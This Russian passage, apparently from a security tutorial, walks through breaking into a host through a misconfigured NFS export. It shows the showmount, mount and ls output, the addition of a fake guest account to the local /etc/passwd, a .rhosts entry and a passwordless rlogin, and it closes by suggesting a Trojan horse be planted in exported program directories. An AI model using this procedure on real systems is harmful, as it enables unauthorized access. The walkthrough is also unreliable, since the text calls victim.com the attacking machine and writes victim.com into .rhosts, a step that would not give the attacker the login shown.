Атака из Internet
ba2f0727

С использованием неправильного администрирования NFS


Предположим, что запуск программы showmount с параметром "атакуемый хост" покажет следующее:


evil % showmount -e victim.com


export list for victim.com:


/export (everyone)


/var (everyone)


/usr easy


/export/exec/kvm/sun4c.sunos.4.1.3 easy


/export/root/easy easy


/export/swap/easy easy

Сразу бросается в глаза, что /export и все его подкаталоги экспортируются во внешнюю среду. Предположим (это можно выяснить с помощью finger), что домашним каталогом пользователя guest

является /export/foo. Теперь с помощью этой информации можно осуществить первое вторжение. Для этого монтируется домашний каталог пользователя guest

удаленной машины. Поскольку даже суперпользователь атакующей машины не может модифицировать файлы на файловой системе, смонтированной как NFS, необходимо обмануть NFS и создать фиктивного пользователя guest в локальном файле паролей. Далее стандартно эксплуатируется "излишнее доверие" , и атакующая машина victim.com вставляется в файл .rhosts в удаленном домашнем каталоге guest, что позволит зарегистрироваться в атакуемой машине, не предоставляя пароля:


evil # mount victim.com:/export/foo /foo




evil # cd /foo


evil # ls -lag


total 3


1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .


1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..


1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest


evil # echo guest:x:10001:1:временно для взлома:/: >> /etc/passwd


evil # su guest


evil % echo victim.com >> guest/.rhosts


evil % rlogin victim.com


Welcome to victim.com!


victim %

Если бы victim.com не экспортировал домашние каталоги пользователей, а только пользовательские каталоги с программами (скажем, /usr или /usr/local/bin), можно было бы заменить команду троянским конем, который бы выполнял те же опе-

рации.



Содержание раздела